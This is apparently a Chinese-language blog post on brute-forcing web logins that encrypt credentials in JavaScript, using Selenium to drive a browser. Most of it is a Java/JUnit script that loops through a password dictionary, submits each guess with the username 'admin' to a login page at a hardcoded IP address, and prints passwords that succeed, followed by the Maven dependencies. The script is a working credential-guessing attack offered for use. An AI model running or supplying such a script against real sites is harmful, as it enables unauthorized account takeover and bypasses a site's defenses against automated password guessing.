使用selenium進行密碼破解（繞過賬號密碼JS加密）

經常碰到網站，賬號密碼通過js加密后進行提交。通過burp攔截抓到的賬號密碼是加密后的，所以無法通過burp instruder進行破解。只能模擬瀏覽器填寫表單并點擊登錄按鈕進行破解。于是想到了自動化web測試工具selenium，代碼如下，測試效果還不錯。

package com.example.tests;

import java.util.regex.Pattern;
import java.io.BufferedReader;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileReader;
import java.util.concurrent.TimeUnit;
import org.junit.*;
import static org.junit.Assert.*;
import static org.hamcrest.CoreMatchers.*;
import org.openqa.selenium.*;
import org.openqa.selenium.firefox.FirefoxDriver;
import org.openqa.selenium.support.ui.Select;

public class GS {
private WebDriver driver;
private String baseUrl;
private boolean acceptNextAlert = true;
private StringBuffer verificationErrors = new StringBuffer();

@Before
public void setUp() throws Exception {
driver = new FirefoxDriver();
baseUrl = "http://223.116.34.113:81/";
driver.manage().timeouts().implicitlyWait(30, TimeUnit.SECONDS);
}

@Test
public void testGS() throws Exception {

File file = new File("C:\\Users\\root\\Desktop\\xxx\\password.txt"); ? //加載密碼字典
FileReader fr = new FileReader(file);
@SuppressWarnings("resource")
BufferedReader br = new BufferedReader(fr);
@SuppressWarnings("unused")
String str = "";

while ((str = br.readLine()) != null) { ? //循環讀取字典里的每一行
String url = baseUrl + "/web/login.aspx?" + str; ?// 后邊加上str是為了每次強制刷新url，加不加看具體情況
driver.get(url);
driver.findElement(By.id("txt_UserID")).clear(); ?//清空用戶名輸入框
driver.findElement(By.id("txt_UserID")).sendKeys(admin); ?//設置用戶名
driver.findElement(By.id("txt_Password")).clear(); ?//清空密碼輸入框
driver.findElement(By.id("txt_Password")).sendKeys(str); ?//設置密碼

driver.findElement(By.xpath("//a/span")).click(); ?//模擬點擊登錄按鈕
Thread.sleep(1000); ? //等待一秒，是否等待看具體情況。
String cururl = driver.getCurrentUrl(); ? // 獲取當前url
if (!cururl.equals(url + "#")) { ??//如果登錄成功會跳轉，則url會發生變化
System.out.println(str); ? //輸入可以登錄成功的密碼

}
}
}

@After
public void tearDown() throws Exception {
driver.quit();
String verificationErrorString = verificationErrors.toString();
if (!"".equals(verificationErrorString)) {
fail(verificationErrorString);
}
}

private boolean isElementPresent(By by) {
try {
driver.findElement(by);
return true;
} catch (NoSuchElementException e) {
return false;
}
}

private boolean isAlertPresent() {
try {
driver.switchTo().alert();
return true;
} catch (NoAlertPresentException e) {
return false;
}
}

private String closeAlertAndGetItsText() {
try {
Alert alert = driver.switchTo().alert();
String alertText = alert.getText();
if (acceptNextAlert) {
alert.accept();
} else {
alert.dismiss();
}
return alertText;
} finally {
acceptNextAlert = true;
}
}
}

?以上代碼依賴如下（maven）：pom.xml

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>

<groupId>F</groupId>
<artifactId>F</artifactId>
<version>0.0.1-SNAPSHOT</version>
<packaging>jar</packaging>

<name>F</name>
<url>http://maven.apache.org</url>

<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
</properties>

<dependencies>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<version>4.12</version>
</dependency>

<dependency>
<groupId>org.seleniumhq.selenium</groupId>
<artifactId>selenium-java</artifactId>
<version>2.53.0</version>
</dependency>

<dependency>
<groupId>org.seleniumhq.selenium</groupId>
<artifactId>selenium-firefox-driver</artifactId>
<version>2.53.0</version>
</dependency>

</dependencies>
</project>